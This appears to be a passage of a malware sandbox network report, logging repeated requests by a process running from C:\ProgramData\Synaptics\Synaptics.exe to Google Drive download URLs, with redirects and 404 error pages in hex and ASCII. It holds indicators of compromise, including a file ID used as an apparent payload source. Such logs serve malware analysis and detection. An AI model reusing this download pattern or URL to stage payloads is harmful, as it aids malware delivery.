                                                                                                                                                                                    2024-12-30 10:51:08 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 4b 68 6d 39 6c 4e 66 48 50 6f 6a 51 72 59 76 35 76 4b 73 6e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="-Khm9lNfHPojQrYv5vKsnA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:51:08 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    28192.168.2.449781142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:08 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:09 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4CwuPgY5GYgIicZUXy8YjUtoWrUUMrFhVoaETNpDFSRAHufQgnrpLXWJLgPDvsxKDl
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:09 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CamNezxI1kin1BxaS9MhsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:09 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:51:09 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 46 30 44 39 4e 46 4b 68 59 39 6a 38 6c 67 61 78 51 49 4c 4c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="mF0D9NFKhY9j8lgaxQILLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:51:09 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    29192.168.2.449782142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:09 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:09 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-U6LKUVkMzl-5SId5l-ZuXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    30192.168.2.449783142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:09 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    31192.168.2.449784142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:09 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    32192.168.2.449785142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:09 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:10 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC7mKpEeIgk6bNDGEG4TXstgyEwMuM0KBIWaTPY6wwwTGMm3GWGNZzXoHSaSYRi7LvLo
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:10 GMT
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-OaRRsahoqkSuqsdJ9QOM_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:10 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:51:10 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 4d 42 68 52 62 62 47 36 51 77 71 58 6f 5f 79 4b 63 77 68 36 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="oMBhRbbG6QwqXo_yKcwh6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:51:10 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    33192.168.2.449787142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:10 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DySIVqOqUy7hNGrlz8bVCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    34192.168.2.449788142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:10 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-igs6jpujGhkZFSm-jWvy1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    35192.168.2.449789142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:10 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:10 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC7mdZHZVMcPaabbSsHAHD0OvbsGFuKUSVCqqovDXfSBWvikhNQfgqKm2mTH2zs__63-0AQBxsI
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:10 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-U5gi83feaSMo0PDTfDSA_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:10 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:51:10 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 79 7a 4e 65 34 50 6b 67 39 49 69 33 6a 32 4d 56 50 5f 56 5f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="2yzNe4Pkg9Ii3j2MVP_V_A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:51:10 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
